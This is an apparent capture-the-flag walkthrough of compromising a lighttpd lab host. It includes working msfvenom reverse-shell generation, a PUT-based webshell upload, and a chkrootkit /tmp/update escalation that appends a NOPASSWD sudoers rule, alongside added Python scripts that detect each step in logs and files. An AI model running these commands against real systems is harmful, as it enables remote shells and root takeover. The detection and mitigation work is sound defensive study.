#1 Find the target
Sweep the subnet to confirm the target's IP is 192.168.1.124:
nmap -sS -O 192.168.1.0/24
#2 Scan the ports
nmap -sS -O -sV 192.168.1.124
Only port 80 is open, so start from the web application.
#3 Find the entrance
Look at the page source: nothing of interest.
Brute-force directories, visit the results, and note the server banner lighttpd/1.4.28; nothing usable turns up for that version.
Scan with nikto for more information:
nikto -host 192.168.1.124
Use nmap's http-methods script to enumerate the HTTP methods allowed on /test: PUT is allowed, so try uploading a file.
nmap 192.168.1.124 -p 80 --script http-methods --script-args http-methods.url-path='/test'
Use msfvenom to generate a PHP webshell (reverse shell):
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.123 LPORT=443 -f raw > shell_443.php
Upload the shell with nmap's http-put script:
nmap 192.168.1.124 -p 80 --script http-put --script-args http-put.url='/test/shell_443.php',http-put.file="shell_443.php"
Use msf exploit/multi/handler to catch the reverse connection.
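From the defender's side, the whole of step #3 leaves a clear trail in the web server's access log: an OPTIONS probe, a PUT that is answered with 2xx, and then a GET of the file that was just written. The script below is an added example, not part of the original writeup, that walks a combined-format access log (the format lighttpd and Apache write) and flags write methods and later requests to any script that a PUT succeeded in placing. The log lines are constructed for the example; the IP, path and file name mirror the ones used above.

```python
import re
from collections import namedtuple

# Pattern for an NCSA/combined access-log line as written by lighttpd and Apache.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: [^"]*)?" (?P<status>\d{3}) (?P<size>\S+)'
)

# Methods that change server-side content; none of them belong on a plain web root.
WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PATCH"}
# Extensions the server may execute rather than serve as static data.
SCRIPT_EXT = (".php", ".phtml", ".php5", ".jsp", ".jspx", ".asp", ".aspx", ".cgi", ".pl", ".py")

Finding = namedtuple("Finding", "ip method path status severity reason")


def parse_line(line):
    """Return (ip, method, path, status) or None for lines that do not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m["ip"], m["method"], m["path"], int(m["status"])


def audit_access_log(lines):
    """Walk the log in order, flagging write methods and later hits on uploaded scripts."""
    findings = []
    uploaded = set()  # script paths for which a write method returned 2xx
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, method, path, status = parsed
        clean_path = path.split("?", 1)[0]
        is_script = clean_path.lower().endswith(SCRIPT_EXT)
        if method in WRITE_METHODS:
            ok = 200 <= status < 300
            if ok and is_script:
                severity = "critical"   # a server-side script now exists at that path
                uploaded.add(clean_path)
            elif ok:
                severity = "high"       # content was written, even if not executable
            else:
                severity = "medium"     # rejected, but someone is probing for PUT
            findings.append(Finding(ip, method, path, status, severity,
                                    "write method " + ("accepted" if ok else "rejected")))
        elif clean_path in uploaded:
            # The uploaded script is being requested: that is the webshell being executed.
            findings.append(Finding(ip, method, path, status, "critical",
                                    "request to a script uploaded earlier in this log"))
    return findings


# Constructed sample log: timestamps and sizes are invented for this example.
SAMPLE_LOG = [
    '192.168.1.123 - - [10/Mar/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 512',
    '192.168.1.123 - - [10/Mar/2024:10:00:05 +0000] "OPTIONS /test HTTP/1.1" 200 0',
    '192.168.1.123 - - [10/Mar/2024:10:00:09 +0000] "PUT /test/shell_443.php HTTP/1.1" 201 0',
    '192.168.1.123 - - [10/Mar/2024:10:00:12 +0000] "PUT /notes.txt HTTP/1.1" 405 0',
    '192.168.1.123 - - [10/Mar/2024:10:00:20 +0000] "GET /test/shell_443.php HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for f in audit_access_log(SAMPLE_LOG):
        print(f"[{f.severity}] {f.ip} {f.method} {f.path} -> {f.status}: {f.reason}")
```

Run against a real log with `audit_access_log(open("/var/log/lighttpd/access.log"))`. The "accepted PUT followed by GET of the same path" pairing is the signal worth alerting on; a rejected PUT on its own is reconnaissance. The fix on the server side is to not enable WebDAV or PUT on directories that are also served with a script handler.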
#4 Privilege escalation
chkrootkit is installed on the box; use the known chkrootkit exploit to escalate.
Create the update file:
touch /tmp/update
Make the update file executable:
chmod +x /tmp/update
Write the sudoers modification into the update file:
echo 'chmod +w /etc/sudoers && echo "www-data ALL=(ALL)NOPASSWD:ALL" >> /etc/sudoers' > /tmp/update
Escalate:
sudo su root
Then look for the flag.
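The escalation in step #4 works because an older chkrootkit, running as root, executes whatever it finds at /tmp/update, and the payload's effect is a NOPASSWD rule for www-data in /etc/sudoers. Both halves are easy to audit for. The script below is an added example, not part of the original writeup: `assess_update_hook` reports whether a file exists at that path, who owns it, whether it is executable and whether its contents mention privilege-related files, and `find_risky_sudoers` lists service accounts that hold a passwordless `ALL` rule. The `demo_report` helper builds a constructed fixture in a temporary directory so the check can be run without touching the real /tmp.

```python
import os
import re
import stat
import tempfile

# Markers a legitimate maintenance script rarely contains but a privilege-escalation
# payload usually does (heuristic list constructed for this example).
SUSPICIOUS = ("sudoers", "NOPASSWD", "chmod +s", "setuid", "/etc/passwd", "/etc/shadow")

# Accounts that should never hold a passwordless ALL rule (constructed list).
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "lighttpd", "http", "nobody"}

# user  host = (runas) spec   -- the common one-line sudoers rule shape.
SUDO_RULE = re.compile(
    r"^(?P<user>[^\s#%]+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<spec>.+)$"
)


def assess_update_hook(tmp_dir="/tmp", name="update"):
    """Report what a root tool would execute if it blindly ran <tmp_dir>/<name>."""
    path = os.path.join(tmp_dir, name)
    report = {"path": path, "exists": os.path.lexists(path), "risk": "none", "reasons": []}
    dir_mode = os.stat(tmp_dir).st_mode
    world_writable_dir = bool(dir_mode & stat.S_IWOTH)
    if world_writable_dir:
        report["reasons"].append("directory is world-writable; any local user can create the file")
    if not report["exists"]:
        report["risk"] = "low" if world_writable_dir else "none"
        return report
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        report["reasons"].append("is a symlink; target can be swapped after inspection")
    if st.st_uid != 0:
        report["reasons"].append(f"owned by uid {st.st_uid}, not root")
    if st.st_mode & stat.S_IWOTH:
        report["reasons"].append("world-writable")
    executable = bool(st.st_mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH))
    if executable:
        report["reasons"].append("executable")
    try:
        with open(path, "rb") as fh:
            head = fh.read(4096).decode("utf-8", "replace")
    except OSError:
        head = ""
    suspicious = any(marker in head for marker in SUSPICIOUS)
    if suspicious:
        report["reasons"].append("content references privilege-related files or flags")
    # Any file here is already bad: a root tool that executes it runs whatever is inside.
    report["risk"] = "critical" if executable and (st.st_uid != 0 or suspicious) else "high"
    return report


def find_risky_sudoers(text):
    """Return service accounts granted NOPASSWD:ALL in the given sudoers text."""
    hits = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(("Defaults", "%")):
            continue
        m = SUDO_RULE.match(line)
        if not m:
            continue
        spec = m["spec"].strip()
        if "NOPASSWD" in spec and spec.endswith("ALL") and m["user"] in SERVICE_ACCOUNTS:
            hits.append(m["user"])
    return hits


def demo_report():
    """Build a constructed fixture in a scratch directory and assess it (never touches /tmp/update)."""
    scratch = tempfile.mkdtemp()
    path = os.path.join(scratch, "update")
    with open(path, "w") as fh:
        fh.write("#!/bin/sh\necho 'demo' >> /etc/sudoers\n")  # constructed content
    os.chmod(path, 0o755)
    try:
        return assess_update_hook(scratch)
    finally:
        os.remove(path)
        os.rmdir(scratch)


if __name__ == "__main__":
    print(assess_update_hook())  # the real /tmp on this host
    print(demo_report())
    print(find_risky_sudoers("root ALL=(ALL:ALL) ALL\nwww-data ALL=(ALL)NOPASSWD:ALL\n"))
```

The mitigation is the same in both places: upgrade chkrootkit so it no longer executes files from /tmp, and treat any NOPASSWD:ALL entry for a web-server account in /etc/sudoers or /etc/sudoers.d as an incident, not a misconfiguration.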